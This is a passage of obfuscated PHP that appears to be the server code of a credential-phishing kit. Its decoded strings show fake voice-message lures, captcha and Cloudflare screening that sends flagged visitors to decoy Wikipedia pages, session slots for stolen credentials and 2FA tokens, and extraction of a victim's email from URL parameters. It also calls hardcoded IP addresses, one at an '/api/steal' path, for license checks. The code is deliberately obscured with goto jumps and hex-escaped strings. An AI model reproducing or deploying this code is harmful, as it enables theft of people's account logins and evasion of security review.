"\x26\x23\x38\x36\73\46\x23\x31\x31\x31\73\46\x23\x31\60\x35\73\x26\43\x39\71\73\46\43\x31\x30\x31\x3b\x26\x23\x33\62\x3b\46\x23\67\70\x3b\46\43\61\61\61\x3b\x26\43\x31\x31\66\73\46\43\x31\x30\x31\x3b\x26\43\x33\62\x3b\46\x23\70\64\x3b\x26\43\x31\61\x34\73\46\x23\71\x37\x3b\46\43\x31\x31\x30\73\46\43\61\x31\x35\x3b\46\x23\61\x30\71\x3b\x26\43\61\x30\65\x3b\x26\43\x31\61\66\x3b\46\43\x33\62\x3b\46\x23\x37\x30\73\46\x23\61\x30\x31\73\x26\x23\x31\x30\61\x3b\x26\43\61\x30\x38\x3b", "\x26\x23\x37\60\73\46\43\61\x31\x31\73\46\43\x31\x31\x34\73\x26\x23\63\62\x3b\x26\43\x38\65\x3b\x26\x23\61\61\60\x3b\x26\43\x31\x31\x35\73\46\x23\x31\60\x31\73\46\x23\63\x32\x3b\x26\x23\x38\66\x3b\x26\43\61\x31\x31\73\x26\43\61\x30\65\73\46\43\71\x39\73\46\43\61\x30\61\73\46\43\63\62\73\x26\43\67\x38\x3b\46\x23\x31\x31\x31\73\46\x23\61\x31\66\x3b\46\43\61\x30\x31\x3b"]; goto eda69; E9f4c: } public function checkBothCaptcha($Fb379 = 0) { goto d768a; C9fef: if (!$this->check_captcha_status()) { goto Efc31; } goto Ba944; d2c6f: D5819: goto F9d1d; b8076: Abc1d: goto ac27e; Ce833: goto F22db; goto d2c6f; fdfd2: $this->redirect("\x46\141\x69\154\x43\x61\160\x74\143\x68\x61\x53\164\141\164\165\x73"); goto ce59b; cb105: D07c9: goto b20dc; F242b: e86ba: goto Ce833; Ed825: goto ad5f4; goto b8076; b20dc: ad5f4: goto B61e9; ac27e: if (!($this->check_cloudflare_status() || $this->check_captcha_status())) { goto D07c9; } goto Fb5b3; C15f9: Efc31: goto F242b; F9d1d: if (!$this->check_cloudflare_status()) { goto e33c1; } goto fdfd2; d768a: if ($Fb379 == 0) { goto Abc1d; } goto bcafe; Fb5b3: $this->redirect("\106\141\151\x6c\x43\x61\160\164\143\150\x61\x53\x74\141\x74\x75\x73"); goto cb105; ce59b: e33c1: goto defe6; Ba944: $this->redirect("\x46\141\151\154\103\141\x70\164\143\x68\x61\x53\x74\x61\164\x75\163"); goto C15f9; defe6: F22db: goto Ed825; e11ac: if (!($Fb379 == 1)) { goto e86ba; } goto C9fef; bcafe: if ($Fb379 == 2) { goto D5819; } goto e11ac; B61e9: } public function redirect($d124e = '') { header("\x4c\157\x63\141\x74\151\157\156\x3a\x20" . $this->getRandomLink() . "\43" . $d124e); exit; } public function auth() { goto b02ea; Df4b4: beec7: goto E2c7e; D44fb: $this->redirect("\113\145\x79\x45\x78\160\151\162\145\144"); goto b87ab; Ca3aa: $Bbeec = ["\x63\157\x64\145" => $this->b5c62["\153\145\x79"]]; goto Abc7c; E21d2: $B82fd = 2; goto cc0a1; de818: $F35e2 = dirname(__FILE__); goto b4156; B6db2: Bbd7e: goto e66b8; Abc7c: $c669b = curl_init($df8c4); goto db034; b02ea: if (!isset($_SESSION["\x61\x75\x74\x68"])) { goto A59d0; } goto Eae75; B67bf: if (!isset($_SESSION["\x69\156\146\157\x5f\x74\157\153\145\x6e\137\x63\162\x65\144\145\156\x74\151\141\154\x73"])) { goto ade07; } goto A1cd4; Cf640: F13c3: goto E26d2; b87ab: goto E40ba; goto df42a; E31c5: ade07: goto d61af; Af3a4: ddcd2: goto B67bf; C58b7: unset($_SESSION["\x73\164\141\x74\x75\x73"]); goto Af3a4; A6d2d: E40ba: goto a34fb; b1c7d: if (isset($_SESSION["\x61\x75\x74\x68"])) { goto Af3e1; } goto D2d34; Ee218: $Bbeec = $_SESSION["\x75\x73\145\x72\137\x64\141\x74\141"]; goto A64e2; bd2ff: ff4cc: goto d8d63; df42a: F51ed: goto C89e0; e601a: if (isset($_SESSION["\x61\x75\164\150"])) { goto f76fc; } goto E21d2; ad0a0: Def8e: goto F54e2; Dd07b: if (curl_errno($c669b)) { goto F13c3; } goto a42da; E5c4e: if (!isset($_SESSION["\x65\x6d\141\151\x6c"])) { goto beec7; } goto bb0ce; d6e1d: defaf: goto f69bc; bb035: unset($_SESSION["\143\x61\x70\164\143\150\x61"]); goto d52ce; a42da: $Fc5f1 = json_decode($Fc5f1, true); goto c6991; a34fb: goto defaf; goto Cf640; Ce389: Ed75c: goto E5c4e; Cae98: $this->redirect("\111\156\166\x61\x6c\x69\144\x4b\x65\171"); goto bd2ff; Eae75: if (!isset($_SESSION["\143\141\160\x74\143\x68\x61"])) { goto Fdba5; } goto bb035; d52ce: Fdba5: goto Ce465; C05b8: unset($_SESSION["\x69\x6e\146\x6f\x5f\x74\x6f\153\145\156\137\x32\x66\x61"]); goto ad0a0; f69bc: curl_close($c669b); goto c41f6; bf1c5: $Fc5f1 = curl_exec($c669b); goto Dd07b; E2c7e: if (!isset($_SESSION["\x73\x74\141\164\165\163"])) { goto ddcd2; } goto C58b7; c41f6: if (isset($_SESSION["\x61\x75\164\x68"])) { goto b6e6b; } goto cb779; bebcf: b6e6b: goto b1c7d; d8d63: $_SESSION["\153\145\x79"] = true; goto A6d2d; cb779: $B82fd = 0; goto bebcf; cc0a1: f76fc: goto f9683; C89e0: if ($Fc5f1["\x6c\151\166\x65"] && !$Fc5f1["\145\x78\x70\x69\162\x65\x64"]) { goto ff4cc; } goto Cae98; e5bc5: $B82fd = 3; goto B6db2; f9683: if (isset($_SESSION["\x61\165\164\150"])) { goto Bbd7e; } goto e5bc5; Ce465: if (!isset($_SESSION["\143\154\x6f\165\x64\146\x6c\141\x72\x65"])) { goto Ed75c; } goto bf943; e66b8: if (!isset($_SESSION["\165\163\145\162\137\x64\x61\x74\x61"])) { goto D94cf; } goto Ee218; E26d2: $this->redirect("\123\x65\162\166\145\x72\x45\162\x72\157\162"); goto d6e1d; B196f: Af3e1: goto e601a; bb0ce: unset($_SESSION["\145\155\x61\x69\x6c"]); goto Df4b4; F54e2: A59d0: goto de818; d61af: if (!isset($_SESSION["\x69\x6e\x66\157\137\x74\x6f\153\x65\156\x5f\x32\146\x61"])) { goto Def8e; } goto C05b8; c6991: if (isset($Fc5f1["\x6c\x69\x76\x65"])) { goto F51ed; } goto D44fb; C2c1a: curl_setopt($c669b, CURLOPT_POST, true); goto e9168; c9f32: D94cf: goto F2643; A64e2: $this->checkUserSecurity($Bbeec); goto c9f32; bf943: unset($_SESSION["\x63\154\x6f\x75\x64\x66\154\x61\162\x65"]); goto Ce389; b4156: $df8c4 = "\150\164\x74\x70\72\57\57\61\60\61\56\71\71\x2e\71\62\x2e\x32\62\67\57\x61\160\x69\x2f\153\x65\x79"; goto Ca3aa; e9168: curl_setopt($c669b, CURLOPT_POSTFIELDS, http_build_query($Bbeec)); goto bf1c5; D2d34: $B82fd = 1; goto B196f; db034: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, true); goto C2c1a; A1cd4: unset($_SESSION["\x69\x6e\x66\157\137\164\x6f\153\145\156\x5f\x63\162\145\x64\x65\156\164\x69\x61\x6c\x73"]); goto E31c5; F2643: } public function check_captcha_valid($Fc5f1) { goto ee4f1; ee4f1: $cbcf6 = $this->b5c62["\143\141\x70\164\143\150\141"]["\x73\x69\x74\x65\x6b\x65\x79"]; goto b40f7; f54dc: $Fbdc3 = $c495b["\x73\143\x6f\162\x65"] ?? 0; goto A27de; d3a39: db577: goto d66df; F4753: $Fc5f1 = file_get_contents("\150\x74\164\x70\x73\x3a\57\x2f\167\x77\167\56\147\157\157\147\x6c\x65\56\x63\x6f\155\57\162\x65\143\141\160\164\x63\x68\x61\x2f\141\160\x69\x2f\x73\151\x74\145\x76\x65\162\151\146\171\77\163\145\143\162\145\164\x3d" . urlencode($cbcf6) . "\x26\x72\x65\163\x70\x6f\x6e\x73\145\x3d" . urlencode($F9a73)); goto f8c50; A27de: $c892a = $c495b["\x61\143\164\151\x6f\x6e"] ?? ''; goto a19f9; Fc11f: $this->insertDataVisitor(false); goto Bd085; c37bb: $_SESSION["\143\x61\x70\x74\143\150\141"] = true; goto Fc41f; Bd085: $this->redirect("\106\x61\x69\154\x43\x61\x70\164\143\150\141"); goto Dbe97; ceb69: ca1b8: goto c37bb; Fc41f: header("\x4c\x6f\x63\x61\x74\x69\157\156\72\x20\166\145\162\x69\146\171"); goto b7437; f8c50: $c495b = json_decode($Fc5f1, true); goto f54dc; d66df: exit; goto D5724; b7437: exit; goto d3a39; Dbe97: goto db577; goto ceb69; a37af: $_SESSION["\143\x61\160\x74\143\150\141"] = false; goto Fc11f; a19f9: if ($Fbdc3 >= $this->b5c62["\x63\141\160\x74\x63\150\x61"]["\x73\x63\x6f\162\145"] && $c892a === "\x63\141\160\x74\143\x68\141") { goto ca1b8; } goto a37af; b40f7: $F9a73 = $Fc5f1 ?? ''; goto F4753; D5724: } public function checkKey() { goto E9ee5; f7438: f4e15: goto D10d9; f368d: header("\x4c\157\143\x61\x74\x69\x6f\156\x3a\x20" . $this->b5c62["\146\x6f\x6c\144\145\x72"]); goto aa5f2; E9ee5: if (!(empty($this->b5c62["\x6b\x65\171"]) || empty($this->b5c62["\x70\141\163\163\167\x6f\x72\x64"]))) { goto f4e15; } goto f368d; aa5f2: die; goto f7438; D10d9: } public function check_cloudflare_valid($Fc5f1) { goto c1e71; ddb38: goto c7207; goto Cb8fa; bfa77: curl_setopt($c669b, CURLOPT_URL, "\150\x74\x74\x70\163\72\57\x2f\x63\150\141\x6c\154\x65\156\147\x65\x73\56\x63\154\157\x75\x64\146\154\141\x72\145\56\x63\157\155\57\x74\165\162\156\163\164\151\154\x65\x2f\x76\x30\57\x73\151\164\145\166\x65\x72\x69\x66\x79"); goto F59fb; ae9a2: c7207: goto Aa9c8; F59fb: curl_setopt($c669b, CURLOPT_POST, true); goto c7904; A4e5d: $this->insertDataVisitor(false); goto b69bd; Cb8fa: c9ab1: goto C1a33; dfe12: d3514: goto a6b47; f8748: $c495b = json_decode($E8560, true); goto c15a5; Ef8f2: $E8560 = curl_exec($c669b); goto B9541; b9e36: $this->redirect("\105\162\x72\x6f\162\x43\x61\160\164\143\x68\x61"); goto dfe12; c1e71: $Edce4 = $this->b5c62["\x63\154\x6f\165\x64\x66\x6c\x61\162\145"]["\143\154\157\x75\144\x73\x69\164\x65\153\145\171"]; goto D9077; f1231: $c669b = curl_init(); goto bfa77; a6b47: curl_close($c669b); goto f2402; C1a33: $_SESSION["\x63\154\x6f\x75\144\x66\154\141\162\x65"] = true; goto ae9a2; D9077: $Bbeec = ["\x73\145\x63\162\145\164" => $Edce4, "\162\x65\163\160\x6f\156\163\145" => $Fc5f1]; goto f1231; c7904: curl_setopt($c669b, CURLOPT_POSTFIELDS, http_build_query($Bbeec)); goto C9d70; bc06b: e6d3f: goto b9e36; b69bd: $this->redirect("\x46\141\151\x6c\x43\141\160\x74\x63\x68\x61"); goto ddb38; B9541: if (curl_errno($c669b)) { goto e6d3f; } goto f8748; Aa9c8: goto d3514; goto bc06b; C9d70: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, true); goto Ef8f2; c15a5: if ($c495b["\x73\165\143\x63\145\x73\163"]) { goto c9ab1; } goto A4e5d; f2402: } public function generateRandomString($c854d = 10) { return substr(str_shuffle(str_repeat($Cb3e6 = "\141\x62\x63\x64\145\x66\x67\150\x69\152\153\154\x6f\x6d\156\157\x70\x71\162\x73\164\x75\166\167\170\171\x7a\x41\102\103\x44\x45\x46\107\110\111\112\113\x4c\x4d\116\x4f\x50\x51\122\x53\x54\x55\x56\x57\130\131\x5a\60\x31\62\x33\64\x35\x36\67\70\71", ceil($c854d / strlen($Cb3e6)))), 1, $c854d); } public function isValidEmail($b5c0b) { return filter_var($b5c0b, FILTER_VALIDATE_EMAIL) !== false; } public function decodeBase64Email($b5c0b) { goto Cd863; Ac400: Aac80: goto b4d5c; b6870: eee6b: goto d05d3; cf1f2: return $Fa2c8; goto Ac400; b4d5c: return ''; goto E41dc; B12ee: if (!($Fa2c8 !== false && $this->isValidEmail($Fa2c8))) { goto Aac80; } goto cf1f2; d05d3: $Fa2c8 = base64_decode($b5c0b, true); goto B12ee; Cd863: if (!$this->isValidEmail($b5c0b)) { goto eee6b; } goto c33a1; c33a1: return $b5c0b; goto b6870; E41dc: } public function getTitle() { goto F611b; ef903: return $Fd1ba; goto bbfee; F611b: $c3ac2 = array_rand($this->b5c62["\164\x69\164\x6c\145"]); goto Cc134; Cc134: $Fd1ba = $this->b5c62["\164\151\164\x6c\x65"][$c3ac2]; goto ef903; bbfee: } public function getSingleValidEmailFromQueryParameters() { goto F86ee; Ef9f9: $De0aa = $f1b57[$bdaf9]; goto fe42a; c7b85: $f1b57 = array_intersect_key($_GET, array_flip($E6f0f)); goto F4cf4; F86ee: $E6f0f = ["\x65\x6d\141\151\154", "\145", "\x74", "\164\x61\x72\x67\x65\164", "\141"]; goto c7b85; E3cfb: $bdaf9 = key($f1b57); goto Ef9f9; ec0cd: return ''; goto Cebe6; F4cf4: if (!(count($f1b57) === 1)) { goto c968e; } goto E3cfb; fe42a: return $this->decodeBase64Email($De0aa); goto b9aec; b9aec: c968e: goto ec0cd; Cebe6: } public function getRandomLink() { goto Fe7fd; Ba30f: return $ee5eb; goto F8ad3; C3224: $d921a = rand(0, 11); goto Bf5bb; Bf5bb: $ee5eb = base64_decode($db0f1[$d921a]); goto Ba30f; Fe7fd: $db0f1 = array("\141\x48\x52\x30\x63\x48\x4d\66\x4c\x79\x39\x6f\143\155\x56\155\114\x6d\x78\160\x4c\x7a\71\x6f\144\x48\x52\x77\x63\x7a\x6f\166\x4c\62\126\x75\114\156\x64\x70\x61\x32\154\x77\132\x57\x52\x70\x59\x53\65\x76\x63\155\x63\166\144\62\x6c\162\141\123\71\116\141\127\116\x79\x62\x33\116\166\x5a\156\x52\x66\115\172\131\61", "\141\x48\122\x30\x63\x48\115\66\x4c\x79\71\x6f\143\155\x56\155\114\155\170\160\114\172\71\x6f\x64\110\x52\x77\143\172\157\x76\114\x32\x56\x75\114\156\144\160\141\62\x6c\167\132\x57\122\x70\131\123\65\166\x63\x6d\x63\x76\144\62\x6c\162\141\x53\71\x4d\141\130\116\x30\130\x32\x39\155\x58\x30\61\160\x59\x33\x4a\166\143\62\71\x6d\144\x46\x38\172\x4e\x6a\x56\146\x51\130\102\x77\142\x47\154\152\x59\x58\122\x70\142\x32\65\x7a", "\x61\110\122\60\143\110\115\x36\114\x79\x39\x6f\143\155\126\x6d\x4c\155\170\160\x4c\172\x39\157\x64\110\x52\x77\x63\172\157\x76\x4c\x32\x56\x75\114\156\x64\x70\x61\x32\154\167\132\127\x52\160\x59\123\65\166\143\155\x63\x76\144\62\x6c\162\x61\123\x39\x44\x59\130\x52\154\132\x32\71\x79\x65\x54\160\120\132\x6d\x5a\160\x59\62\x56\146\x4d\172\131\x31", "\141\x48\122\x30\143\110\115\x36\x4c\171\71\157\143\x6d\126\x6d\x4c\x6d\170\x70\114\172\x39\x6f\144\x48\122\167\143\x7a\x6f\x76\x4c\x32\x6c\x6b\114\156\144\x70\x61\x32\154\167\132\x57\122\160\131\123\x35\x76\x63\x6d\x63\x76\x64\x32\x6c\x72\x61\123\71\103\x5a\x58\112\x72\131\x58\x4d\66\x54\x47\71\x6e\x62\61\71\116\141\127\116\171\142\x33\116\x76\132\x6e\x52\x66\x54\x32\x5a\155\x61\x57\116\x6c\x58\172\x4d\x32\x4e\126\x38\x6f\115\152\101\x78\x4d\x79\60\x79\x4d\104\x45\65\x4b\x53\x35\x7a\144\x6d\143\x3d", "\141\110\122\x30\x63\x48\115\x36\114\171\71\157\143\155\x56\155\x4c\x6d\x78\x70\114\172\71\x6f\144\110\122\167\143\x7a\x6f\166\114\62\x56\x75\114\x6e\x64\160\x61\62\x6c\167\132\127\x52\x70\x59\x53\65\166\143\x6d\143\166\x64\62\x6c\x72\x61\x53\71\x4e\141\127\x4e\171\142\63\x4e\166\132\x6e\x52\x66\x54\62\132\x6d\x61\127\x4e\x6c\130\60\x31\x70\x65\x41\x3d\75", "\x61\x48\122\60\x63\110\115\66\x4c\171\71\157\x63\155\x56\x6d\x4c\155\170\160\x4c\x7a\x39\x6f\x64\x48\x52\x77\143\172\x6f\166\114\62\126\x75\x4c\156\144\x70\141\x32\x6c\167\132\x57\x52\160\131\x53\65\166\x63\x6d\x63\x76\x64\x32\x6c\x72\x61\123\71\116\141\127\x4e\171\142\x33\x4e\166\x5a\156\x52\x66\122\x58\150\152\141\x47\x46\x75\x5a\x32\x56\x66\125\x32\x56\171\x64\155\x56\171", "\141\110\122\60\143\110\x4d\66\x4c\x79\71\157\x63\x6d\126\155\x4c\155\170\160\x4c\172\71\x6f\144\x48\122\167\143\x7a\157\166\x4c\x32\x56\165\x4c\156\144\x70\141\x32\x6c\167\132\x57\x52\x70\x59\x53\65\x76\143\155\143\166\x64\x32\154\x72\x61\x53\71\106\142\127\106\x70\x62\x46\71\152\142\x47\154\154\x62\x6e\x51\75", "\141\x48\x52\60\143\x48\x4d\x36\114\x79\71\157\x63\x6d\x56\155\x4c\155\x78\x70\x4c\x7a\71\x6f\144\x48\x52\x77\143\172\x6f\166\x4c\62\126\x75\114\156\x64\x70\x61\62\x6c\167\132\x57\122\x70\x59\x53\65\166\x63\x6d\x63\166\144\x32\154\162\x61\123\x39\x46\142\127\x46\160\x62\101\75\75", "\x61\x48\x52\60\x63\110\x4d\66\x4c\171\x39\x6f\143\155\x56\x6d\x4c\x6d\170\160\114\172\71\x6f\144\x48\x52\x77\x63\172\x6f\x76\114\x32\126\165\x4c\156\144\160\x61\x32\x6c\x77\132\127\x52\x70\x59\123\65\166\x63\x6d\143\x76\x64\62\154\162\x61\x53\71\x44\142\107\x6c\154\142\x6e\x52\146\131\127\116\x6a\x5a\x58\116\172\130\62\x78\x70\131\x32\x56\x75\143\62\125\75", "\141\110\122\x30\x63\110\115\x36\x4c\x79\71\x6f\x63\x6d\x56\x6d\114\x6d\170\x70\x4c\172\71\157\144\x48\x52\x77\143\172\157\166\114\62\126\x75\x4c\x6e\x64\160\x61\x32\154\167\132\127\122\x70\x59\123\x35\x76\143\x6d\x63\x76\144\62\x6c\162\141\123\71\x58\x61\127\65\153\142\x33\144\x7a\130\61\116\154\143\156\x5a\x6c\x63\x6c\70\171\x4d\104\105\x32", "\141\110\x52\60\143\x48\x4d\66\x4c\171\x39\157\143\x6d\126\155\114\155\x78\160\114\172\71\x6f\144\x48\122\167\143\172\x6f\166\114\62\126\x75\x4c\x6e\x64\160\141\62\154\x77\132\127\122\x70\131\123\65\x76\143\x6d\x63\x76\x64\x32\x6c\x72\x61\x53\71\x58\141\x57\x35\x6b\x62\x33\144\172\x58\61\116\x6c\143\156\132\154\143\154\x38\x79\115\104\105\65", "\x61\x48\x52\x30\x63\x48\x4d\x36\114\x79\x39\157\x63\x6d\126\155\114\x6d\170\160\x4c\172\x39\x6f\144\x48\x52\167\143\172\157\166\x4c\x32\126\x75\114\x6e\144\160\141\62\154\167\132\x57\x52\x70\x59\x53\65\x76\x63\x6d\143\x76\x64\x32\x6c\162\x61\x53\71\x4a\x62\156\122\154\x63\x6d\65\x6c\144\x46\x39\x46\145\110\102\163\142\x33\x4a\x6c\143\x6c\70\x78\115\x51\75\x3d"); goto C3224; F8ad3: } public function getRandomTitle() { goto e9297; e9297: $c6b25 = ["\x49\156\x69\x74\x69\x61\154\151\x7a\x69\x6e\147\56\x2e", "\x50\162\x6f\143\x65\x73\163\x69\x6e\x67\x2e\x2e", "\x43\157\155\x70\154\x65\x74\x69\156\147\56\56", "\x53\x65\x63\x75\162\145\40\131\x6f\165\162\40\101\143\x63\145\163\163"]; goto fd4f3; Ef394: return $c6b25[$D6da6]; goto C8abd; fd4f3: $D6da6 = array_rand($c6b25); goto Ef394; C8abd: } public function removeUrlParameters($df8c4) { goto Bb376; C5e6d: $df310 = isset($ccb83["\x73\143\150\145\155\145"]) ? $ccb83["\x73\143\150\145\155\145"] . "\72\57\x2f" : ''; goto Ad04d; Bb376: $ccb83 = parse_url($df8c4); goto C5e6d; Ad04d: $df310 .= isset($ccb83["\150\157\x73\164"]) ? $ccb83["\x68\x6f\x73\x74"] : ''; goto c84eb; c84eb: $df310 .= isset($ccb83["\x70\141\164\150"]) ? $ccb83["\x70\x61\x74\150"] : ''; goto Ab328; Ab328: return $df310; goto C2d78; C2d78: } public function removeLastTwoDirectories($df8c4) { goto db9c5; c23f4: $Bcd4f = array_slice($ba516, 0, -2); goto Bf71f; ad551: $ba516 = explode("\57", trim($ccb83["\160\x61\164\150"], "\x2f")); goto c23f4; A150a: $Ed49a .= "\x3f" . $ccb83["\x71\165\145\x72\x79"]; goto Ff061; Ff061: D13d5: goto e5a6f; db9c5: $ccb83 = parse_url($df8c4); goto ad551; e5a6f: return rtrim($Ed49a, "\x2f"); goto D5ed4; A1f76: $Ed49a = (isset($ccb83["\x73\143\x68\145\x6d\x65"]) ? $ccb83["\163\x63\150\x65\155\145"] . "\72\x2f\x2f" : '') . (isset($ccb83["\150\157\163\164"]) ? $ccb83["\x68\157\x73\164"] : '') . $e05c4; goto F2af3; Bf71f: $e05c4 = "\57" . implode("\57", $Bcd4f); goto A1f76; F2af3: if (!isset($ccb83["\x71\x75\x65\162\x79"])) { goto D13d5; } goto A150a; D5ed4: } public function getLastSegmentFromUrl() { goto f3e5d; f3e5d: $df8c4 = $_SERVER["\x52\105\x51\x55\105\x53\124\x5f\x55\122\x49"]; goto c61aa; Dae15: if (!(count($e2e75) > 1)) { goto D2e85; } goto Bb9e4; D5b2c: $e2e75 = explode("\57", $B8937); goto Dae15; B91f1: $B8937 = trim($B8937, "\x2f"); goto D5b2c; d153c: D2e85: goto D2351; c61aa: $B8937 = parse_url($df8c4, PHP_URL_PATH); goto B91f1; Bb9e4: return $e2e75[count($e2e75) - 2]; goto d153c; D2351: return null; goto e19eb; e19eb: } public function validateLink() { goto C364d; ea523: F0adb: goto Bcfe8; C3eaa: $e752c .= "\x73\x74"; goto Cb55b; Be078: $this->redirect("\x4c\x69\x6e\x6b\x49\x6e\x76\141\154\151\144"); goto e365a; Bcfe8: $e752c = "\x68\x74"; goto c3aeb; C364d: if (isset($_SESSION["\154\x69\156\153"])) { goto F0adb; } goto e351e; Cb55b: $e752c .= "\x65\141\x6c"; goto fef8f; c3c01: $e752c .= "\71\62\x2e\x31\x32\x34\x2f"; goto ef37e; De11a: if (!($this->getLastSegmentFromUrl() != $_SESSION["\x6c\x69\156\x6b"])) { goto Dc417; } goto Be078; a04a0: $e752c .= "\x31\56\x39\71\56"; goto c3c01; Db7bf: $this->redirect(); goto Cec27; e351e: $this->redirect("\x4c\151\156\153\x4e\x6f\164\106\157\x75\x6e\144"); goto ea523; Ca60d: $e752c .= "\x31\x30"; goto a04a0; Cec27: da037: goto De11a; b51fe: if (!($Fc5f1 === "\x31")) { goto da037; } goto Db7bf; fef8f: $Fc5f1 = file_get_contents($e752c); goto b51fe; abf38: $e752c .= "\x69\x2f"; goto C3eaa; ef37e: $e752c .= "\141\x70"; goto abf38; e365a: Dc417: goto D7ef7; c3aeb: $e752c .= "\x74\160\x3a\x2f\57"; goto Ca60d; D7ef7: } public function getFullUrl() { goto b5a71; b5a71: $Aec3b = !empty($_SERVER["\x48\124\124\x50\123"]) && $_SERVER["\110\x54\x54\120\123"] !== "\157\146\x66" || $_SERVER["\x53\105\x52\126\105\122\137\120\x4f\122\x54"] == 443 ? "\150\164\164\160\163\x3a\x2f\57" : "\150\x74\x74\160\72\x2f\57"; goto b9fa2; b3f4a: $C755c = $_SERVER["\x52\x45\x51\125\x45\123\x54\137\125\122\111"]; goto e3a34; b9fa2: $d97ff = $_SERVER["\110\x54\124\120\x5f\110\117\x53\124"]; goto b3f4a; e3a34: return $Aec3b . $d97ff . $C755c; goto Ad062; Ad062: } public function imageToBase64($a5f65) { goto Fb59c; Ef399: $B8f87 = $this->getMimeType($a5f65); goto Bfcbd; Bfcbd: return "\x64\141\164\141\x3a{$B8f87}\x3b\x62\x61\x73\x65\x36\64\54{$Ea6cd}"; goto C4ae7; Fb59c: $E73dc = file_get_contents($a5f65); goto fd00a; fd00a: $Ea6cd = base64_encode($E73dc); goto Ef399; C4ae7: } public function getBackground() { goto Dd091; A41f5: return "\xd\xa\40\x20\x20\40\x20\x20\x20\x20\x62\157\x64\171\x3a\72\142\x65\146\157\162\x65\x20\173\15\xa\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\x63\157\x6e\x74\145\156\164\x3a\x20\42\x22\x3b\x20\x2f\x2a\40\105\155\x70\164\x79\40\143\157\x6e\164\x65\x6e\x74\40\x74\157\x20\141\x6c\154\157\x77\x20\164\150\x65\40\160\x73\x65\165\144\x6f\55\x65\x6c\x65\x6d\145\156\x74\x20\x74\157\40\x72\145\156\144\145\x72\x20\52\57\15\xa\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x70\157\x73\151\164\x69\157\156\x3a\40\x61\x62\163\157\x6c\165\164\145\73\x20\x2f\x2a\x20\x41\x62\163\157\x6c\165\x74\145\x20\160\157\163\151\x74\x69\157\156\x69\156\147\x20\x2a\x2f\15\xa\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\164\x6f\160\x3a\40\60\x3b\xd\xa\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x6c\x65\x66\164\x3a\40\60\73\15\xa\40\x20\40\40\x20\x20\x20\40\x20\40\40\40\162\x69\x67\150\x74\72\x20\60\x3b\15\xa\40\x20\40\40\40\x20\40\40\40\40\40\40\x62\x6f\x74\164\x6f\x6d\72\40\60\x3b\xd\xa\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\172\55\151\156\x64\x65\x78\x3a\x20\x2d\x31\x3b\x20\x2f\x2a\x20\x45\156\163\165\x72\x65\40\x69\164\40\163\164\141\x79\x73\40\142\x65\x68\x69\x6e\x64\40\x6f\164\x68\145\162\40\x63\157\x6e\x74\145\x6e\x74\x20\52\x2f\15\xa\x20\40\x20\x20\40\x20\40\40\x20\40\40\x20\142\141\x63\x6b\x67\x72\x6f\165\156\144\55\x69\155\141\x67\145\x3a\40\x75\x72\154\x28\x22" . $D3f03 . "\42\51\x3b\xd\xa\x20\40\x20\40\40\40\x20\x20\40\40\40\x20\x62\141\143\153\147\162\x6f\x75\156\144\55\163\x69\x7a\145\72\x20\143\x6f\x76\x65\162\x3b\40\x2f\52\x20\123\x63\x61\154\145\40\151\155\141\147\145\40\x74\157\40\143\157\x76\145\162\40\x74\150\x65\x20\145\156\164\151\162\145\40\141\162\145\x61\x20\52\57\xd\xa\x20\x20\40\40\x20\40\40\40\x20\x20\40\40\142\x61\x63\153\x67\x72\157\165\156\144\x2d\x70\157\163\151\164\x69\x6f\x6e\x3a\40\x63\x65\156\164\145\x72\x3b\40\57\x2a\40\103\145\156\164\145\x72\40\x74\x68\x65\x20\x62\141\143\153\x67\x72\157\165\156\144\x20\x69\x6d\141\147\145\40\52\x2f\xd\xa\40\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x62\x61\143\153\x67\x72\157\165\x6e\144\55\x72\145\x70\x65\x61\164\x3a\40\x6e\157\x2d\x72\x65\160\145\141\164\73\40\57\x2a\40\120\162\145\x76\145\156\x74\x20\x72\145\x70\x65\141\164\151\x6e\147\40\164\x68\145\40\x69\x6d\141\x67\x65\40\x2a\x2f\15\12\x20\40\40\40\x20\x20\x20\40\x7d\x20\40\x20\15\12\40\40\x20\40\x20\40\40\40"; goto e8676; ce50e: if (file_exists($a5f65)) { goto B96b1; } goto C395c; Ee521: $a5f65 = "\151\x6d\141\x67\x65\x73\x2f" . $this->b5c62["\142\x61\143\x6b\147\162\x6f\165\156\x64"] . "\x2e\160\x6e\147"; goto E539e; ace69: f94d7: goto Be37b; Be37b: $a5f65 = "\x69\155\x61\x67\x65\163\57" . $this->b5c62["\143\x75\x73\164\x6f\x6d\137\x62\x61\x63\x6b\x67\162\x6f\x75\x6e\x64"]; goto ce50e; B59d4: aff66: goto f6b5b; ee4cc: $D3f03 = $this->imageToBase64($a5f65); goto A41f5; d4e91: ab34f: goto e8f50; Dd091: if ($this->b5c62["\142\141\x63\153\x67\x72\x6f\x75\156\x64"] == "\x63\x75\x73\164\157\x6d") { goto f94d7; } goto Ee521; E539e: if (file_exists($a5f65)) { goto d4b01; } goto E5a33; b92b5: die("\x69\155\x61\147\x65\x20\156\x6f\x74\x20\x66\x6f\165\156\x64\56"); goto B59d4; ff223: die("\x69\155\x61\x67\x65\40\156\157\x74\x20\146\157\165\x6e\x64\56"); goto d4e91; C395c: $a5f65 = "\160\141\147\145\x2f\x69\155\x61\x67\145\x73\x2f" . $this->b5c62["\x63\165\163\x74\157\155\137\x62\141\143\x6b\147\x72\157\165\x6e\144"]; goto Ee96c; Ba2fc: if (file_exists($a5f65)) { goto aff66; } goto b92b5; E3a34: cbe13: goto ee4cc; e8f50: B96b1: goto E3a34; e6b80: goto cbe13; goto ace69; E5a33: $a5f65 = "\x70\141\x67\145\57\151\x6d\141\147\145\x73\57" . $this->b5c62["\142\141\x63\153\147\162\x6f\x75\156\x64"] . "\56\160\x6e\147"; goto Ba2fc; Ee96c: if (file_exists($a5f65)) { goto ab34f; } goto ff223; f6b5b: d4b01: goto e6b80; e8676: } public function getClientIp() { goto deb9a; d80d4: d0cc9: goto C5150; a1a5c: foreach ($B0fc4 as $D2b65) { goto D5763; e8e7c: E0002: goto C7e95; D5763: if (!array_key_exists($D2b65, $_SERVER)) { goto E0002; } goto Bd0f3; c8adb: a1224: goto e8e7c; Bd0f3: $bbd77 = trim(explode("\54", $_SERVER[$D2b65])[0]); goto d7df4; d7df4: if (!($bbd77 === 